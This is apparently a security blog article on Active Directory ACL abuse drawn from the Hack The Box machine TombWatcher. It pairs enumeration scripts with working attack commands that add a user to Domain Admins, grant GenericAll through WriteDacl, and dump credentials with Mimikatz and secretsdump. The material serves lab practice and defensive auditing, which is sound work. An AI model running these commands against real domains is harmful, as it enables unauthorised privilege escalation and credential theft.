
Luis Moret’s recent Hack The Box (HTB) challenge, TombWatcher, highlights advanced Active Directory (AD) exploitation techniques, particularly ACL (Access Control List) abuse and deep enumeration beyond BloodHound’s default visibility. The machine requires digging into hidden attack paths to uncover privilege escalation opportunities.
You Should Know:
1. ACL Abuse Commands
Every AD object carries a security descriptor whose DACL lists which principals hold which rights over it. An ACE that gives a low-privileged principal rights such as GenericAll, WriteDacl or WriteOwner over a more privileged user, group or computer is an escalation path; these ACEs are exactly what BloodHound draws as edges.
Enumerate the DACL of a target object (PowerShell, ActiveDirectory module)
Get-ADObject -Identity "CN=Target,OU=Users,DC=domain,DC=com" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor | Select-Object -ExpandProperty Access
Check who holds GenericAll, WriteDacl or WriteOwner (PowerShell; Import-Module ActiveDirectory provides the AD: drive, and ActiveDirectoryRights is a flags value, so match rather than compare for equality)
(Get-Acl "AD:\CN=Target,OU=Users,DC=domain,DC=com").Access | Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner" } | Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType
Abuse GenericAll (or WriteProperty on the member attribute) over a privileged group to add a controlled user; the right must be held over the group object itself, not over the user being added (GenericAll over a user instead allows a password reset or a shadow-credentials attack)
Add-ADGroupMember -Identity "Domain Admins" -Members "CompromisedUser"
2. BloodHound Deep Enumeration
BloodHound only shows edges for what SharpHound collected and knows how to interpret; rights conveyed by custom or uncommon ACEs, by attributes it does not model, or by objects outside the collection scope do not appear in the graph. Manual LDAP queries help uncover those paths:
LDAP query for users flagged adminCount=1 (Linux)
ldapsearch -x -H ldap://domain.com -D "user@domain.com" -w "password" -b "DC=domain,DC=com" "(adminCount=1)"
Check for unconstrained delegation (PowerShell; TrustedForDelegation is the unconstrained flag, userAccountControl 0x80000, not constrained delegation)
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
Check for constrained delegation (the permitted SPN list lives in msDS-AllowedToDelegateTo; TrustedToAuthForDelegation marks protocol transition)
Get-ADComputer -LDAPFilter "(msDS-AllowedToDelegateTo=*)" -Properties msDS-AllowedToDelegateTo, TrustedToAuthForDelegation
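The following is an added example and is not code from the original post or from the TombWatcher write-up. It separates the three Kerberos delegation forms that a single TrustedForDelegation check conflates (unconstrained, constrained with or without protocol transition, and resource-based constrained delegation, which is configured on the target rather than the front end) and reports adminCount on the same objects. The sample records at the bottom are constructed to look like Get-ADObject output so the classifier runs offline; Find-Delegation is the live version and assumes the RSAT ActiveDirectory module and a reachable domain. The function names and the host names DC01, WEB01, FS01 and WKS01 are assumptions of this example.

```powershell
# Added example, not code from the original post. Classifies Kerberos delegation
# settings from userAccountControl bits and the two delegation attributes.

$UAC_TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation (what TrustedForDelegation means)
$UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition (S4U2Self)
$UAC_NOT_DELEGATED                  = 0x100000   # "account is sensitive and cannot be delegated"

function Get-DelegationType {
    param([Parameter(Mandatory, ValueFromPipeline)]$Object)
    process {
        $uac   = [int]$Object.userAccountControl
        $types = @()
        if (($uac -band $UAC_TRUSTED_FOR_DELEGATION) -ne 0) { $types += 'Unconstrained' }
        if ($Object.'msDS-AllowedToDelegateTo') {
            # The SPN list lives on the front-end account. With protocol transition it can
            # request service tickets for any user without that user authenticating to it.
            $types += if (($uac -band $UAC_TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0) { 'Constrained+ProtocolTransition' } else { 'Constrained' }
        }
        if ($Object.'msDS-AllowedToActOnBehalfOfOtherIdentity') {
            # RBCD is configured on the target: whoever can write this attribute controls it.
            $types += 'RBCD-target'
        }
        if ($types.Count -eq 0) { return }   # nothing delegation-related on this object
        [pscustomobject]@{
            Name         = $Object.Name
            Delegation   = $types -join ','
            AllowedTo    = @($Object.'msDS-AllowedToDelegateTo') -join ';'
            AdminCount   = [int]$Object.adminCount               # 1 = protected by SDProp, now or in the past
            NotDelegated = (($uac -band $UAC_NOT_DELEGATED) -ne 0)
        }
    }
}

function Find-Delegation {
    # Live query (needs the ActiveDirectory module). 1.2.840.113556.1.4.803 is the LDAP
    # bitwise-AND matching rule, so the first clause selects unconstrained delegation;
    # the other two select constrained delegation and RBCD targets.
    $filter = "(|(userAccountControl:1.2.840.113556.1.4.803:=$UAC_TRUSTED_FOR_DELEGATION)" +
              "(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
    Get-ADObject -LDAPFilter $filter -Properties userAccountControl, msDS-AllowedToDelegateTo, msDS-AllowedToActOnBehalfOfOtherIdentity, adminCount |
        Get-DelegationType
}

# Constructed sample records (not from a real domain): a domain controller, a web server
# allowed to delegate to the file server's CIFS service, the file server with RBCD
# configured, and a plain workstation. The RBCD value is placeholder bytes; in AD it is
# a binary security descriptor.
$Sample = @(
    [pscustomobject]@{ Name = 'DC01$';  userAccountControl = 0x82000;   'msDS-AllowedToDelegateTo' = $null
                       'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null;                 adminCount = $null }
    [pscustomobject]@{ Name = 'WEB01$'; userAccountControl = 0x1001000; 'msDS-AllowedToDelegateTo' = @('cifs/FS01.domain.com')
                       'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null;                 adminCount = $null }
    [pscustomobject]@{ Name = 'FS01$';  userAccountControl = 0x1000;    'msDS-AllowedToDelegateTo' = $null
                       'msDS-AllowedToActOnBehalfOfOtherIdentity' = [byte[]](1, 0, 4, 128); adminCount = $null }
    [pscustomobject]@{ Name = 'WKS01$'; userAccountControl = 0x1000;    'msDS-AllowedToDelegateTo' = $null
                       'msDS-AllowedToActOnBehalfOfOtherIdentity' = $null;                 adminCount = $null }
)
$Sample | Get-DelegationType | Format-Table -AutoSize
```

On the constructed records, DC01 is reported as Unconstrained (0x82000 is SERVER_TRUST_ACCOUNT plus TRUSTED_FOR_DELEGATION), WEB01 as Constrained+ProtocolTransition with cifs/FS01.domain.com as its target, FS01 as an RBCD target, and the workstation is dropped. Against a live domain, replace the sample pipeline with Find-Delegation.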
3. Privilege Escalation via ACL Abuse
If a user has WriteDacl on an object, they can rewrite that object's DACL to grant themselves whatever rights they need, typically GenericAll, and then use those rights (password reset, group membership, and so on). The ActiveDirectoryAccessRule constructor takes an IdentityReference (a SID or NTAccount), not a bare user name:
Grant yourself GenericAll rights (requires WriteDacl on the target)
$path = "AD:\CN=Target,OU=Users,DC=domain,DC=com"
$acl = Get-Acl -Path $path
$sid = (Get-ADUser -Identity "CompromisedUser").SID
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($sid, [System.DirectoryServices.ActiveDirectoryRights]::GenericAll, [System.Security.AccessControl.AccessControlType]::Allow)
$acl.AddAccessRule($ace)
Set-Acl -Path $path -AclObject $acl
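The following is an added example and is not code from the original post or from the TombWatcher write-up. It covers the enumeration step behind sections 1 and 3: parse an object's security descriptor offline, in SDDL form, and list the allow ACEs that hand a non-default principal GenericAll, WriteDacl, WriteOwner, or a scoped WriteProperty/ExtendedRight that is known to be abusable (password reset, group membership, shadow credentials, RBCD, DCSync). These are the ACEs BloodHound turns into edges, and reading the raw DACL is how you find the ones it did not. The SDDL and the domain SID S-1-5-21-1004336348-1177238915-682003330 are constructed; the function name Get-AbusableAce and the ignore lists are assumptions of this example. SDDL parsing goes through a Win32 call, so this runs on Windows PowerShell 5.1 or pwsh on Windows, with no domain connectivity needed.

```powershell
# Added example, not code from the original post. Parses an AD security descriptor
# (SDDL) offline and reports abusable ACEs held by non-default principals.

# Control-access rights and attributes whose scoped ACEs are worth flagging.
$KnownGuids = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'                 # reset password
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'                                     # add members to a group
    '5b47d60f-6090-40b2-9f37-2a4de88f3063' = 'msDS-KeyCredentialLink'                     # shadow credentials
    '3f78c3e5-f79a-46bd-a0b8-9d18116ddc79' = 'msDS-AllowedToActOnBehalfOfOtherIdentity'   # RBCD
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'                 # DCSync (with the next one)
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}
$AbusableWriteProperty = 'member', 'msDS-KeyCredentialLink', 'msDS-AllowedToActOnBehalfOfOtherIdentity'
$AbusableExtendedRight = 'User-Force-Change-Password', 'DS-Replication-Get-Changes', 'DS-Replication-Get-Changes-All'

function Get-AbusableAce {
    param(
        [Parameter(Mandatory)][string]$Sddl,
        # Expected holders of broad rights: SYSTEM, BUILTIN\Administrators, SELF ...
        [string[]]$IgnoreSid = @('S-1-5-18', 'S-1-5-32-544', 'S-1-5-10'),
        # ... and, in any domain, Domain Admins, Domain Controllers, Enterprise Admins, Enterprise RODCs.
        [int[]]$IgnoreRid = @(512, 516, 519, 498)
    )
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs can be abused; skip deny ACEs and unrecognised ACE types.
        if ($ace -isnot [System.Security.AccessControl.QualifiedAce]) { continue }
        if ($ace.AceQualifier -ne [System.Security.AccessControl.AceQualifier]::AccessAllowed) { continue }

        $sid = $ace.SecurityIdentifier.Value
        $rid = [int]($sid.Split('-')[-1])
        if ($IgnoreSid -contains $sid) { continue }
        if ($sid.StartsWith('S-1-5-21-') -and ($IgnoreRid -contains $rid)) { continue }

        # Object ACEs scope the right to one attribute or one control-access right.
        $objectType = $null
        if ($ace -is [System.Security.AccessControl.ObjectAce] -and
            (($ace.ObjectAceFlags -band [System.Security.AccessControl.ObjectAceFlags]::ObjectAceTypePresent) -ne 0)) {
            $guid = $ace.ObjectAceType.ToString()
            $objectType = if ($KnownGuids.ContainsKey($guid)) { $KnownGuids[$guid] } else { $guid }
        }

        $mask   = $ace.AccessMask
        $rights = @()
        # GENERIC_ALL bit, or every DS-specific bit set (0xF01FF): full control either way.
        if ((($mask -band 0x10000000) -ne 0) -or (($mask -band 0xF01FF) -eq 0xF01FF)) { $rights += 'GenericAll' }
        else {
            if (($mask -band 0x40000) -ne 0) { $rights += 'WriteDacl' }    # rewrite the DACL
            if (($mask -band 0x80000) -ne 0) { $rights += 'WriteOwner' }   # take ownership, then WriteDacl
            # Unscoped WriteProperty/ExtendedRight cover every attribute/right; scoped ones
            # only matter for the attributes and rights listed above.
            if ((($mask -band 0x20)  -ne 0) -and ($null -eq $objectType -or $objectType -in $AbusableWriteProperty)) { $rights += 'WriteProperty' }
            if ((($mask -band 0x100) -ne 0) -and ($null -eq $objectType -or $objectType -in $AbusableExtendedRight)) { $rights += 'ExtendedRight' }
        }
        if ($rights.Count -eq 0) { continue }

        [pscustomobject]@{
            PrincipalSid = $sid
            Rights       = $rights -join ','
            ObjectType   = if ($objectType) { $objectType } else { '(all)' }
            Inherited    = (($ace.AceFlags -band [System.Security.AccessControl.AceFlags]::Inherited) -ne 0)
        }
    }
}

# Constructed sample descriptor (made-up domain SID): the default SYSTEM, Domain Admins and
# Authenticated Users entries plus four ACEs for ordinary domain principals, RIDs 1105-1108.
$DomainSid  = 'S-1-5-21-1004336348-1177238915-682003330'
$SampleSddl = "O:${DomainSid}-512G:${DomainSid}-512D:" +
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)" +                                # SYSTEM: full control (default)
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;${DomainSid}-512)" +                 # Domain Admins: full control (default)
    "(A;;RPLCLORC;;;AU)" +                                                 # Authenticated Users: read (default)
    "(A;;WD;;;${DomainSid}-1105)" +                                        # RID 1105: WriteDacl
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;${DomainSid}-1106)" +   # RID 1106: User-Force-Change-Password
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;${DomainSid}-1107)" +   # RID 1107: write the member attribute
    "(OA;;RP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;${DomainSid}-1108)"     # RID 1108: read-only, not abusable

Get-AbusableAce -Sddl $SampleSddl | Format-Table -AutoSize

# Against a live object (ActiveDirectory module loaded), feed in the object's own SDDL:
# Get-AbusableAce -Sddl (Get-Acl "AD:\CN=Target,OU=Users,DC=domain,DC=com").GetSecurityDescriptorSddlForm('All')
```

Of the constructed ACEs, the three held by RIDs 1105, 1106 and 1107 are reported (WriteDacl over the whole object, ExtendedRight scoped to User-Force-Change-Password, WriteProperty scoped to member); the read-only ACE and the default SYSTEM and Domain Admins entries are not. The ignore lists are deliberately short: Account Operators and other semi-privileged built-ins are left in the output on purpose, because rights granted to them are part of the attack surface rather than noise.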
4. Post-Exploitation: Dumping Credentials
After gaining admin access, extract credentials:
Mimikatz (Windows; sekurlsa::logonpasswords reads LSASS memory and needs SeDebugPrivilege, so enable it first unless already running as SYSTEM)
privilege::debug
sekurlsa::logonpasswords
Secretsdump (Impacket, Linux; add -just-dc when the target is a domain controller to pull only the NTDS hashes over DRSUAPI)
secretsdump.py DOMAIN/user:password@target-ip
What Undercode Say:
ACL abuse remains a critical attack vector in AD environments. BloodHound provides a great starting point, but manual LDAP enumeration reveals hidden attack paths. Always check for:
– GenericAll, WriteDACL, and WriteOwner permissions
– Constrained/Unconstrained Delegation misconfigurations
– adminCount=1 users (SDProp sets the flag on members of protected groups and does not clear it when they leave, so it also marks former admins worth checking)
Expected Output:
Example: Finding users with adminCount=1
ldapsearch -x -H ldap://domain.local -D "user@domain.local" -w "Pass123" -b "DC=domain,DC=local" "(adminCount=1)"
Output:
dn: CN=AdminUser,OU=Admins,DC=domain,DC=local
adminCount: 1
Prediction:
As AD environments grow more complex, automated tools like BloodHound will improve, but attackers will continue exploiting overlooked manual misconfigurations. Expect more ACL-based attacks in 2025.
Reference:
Reported By: Luis Moret – Hackers Feeds


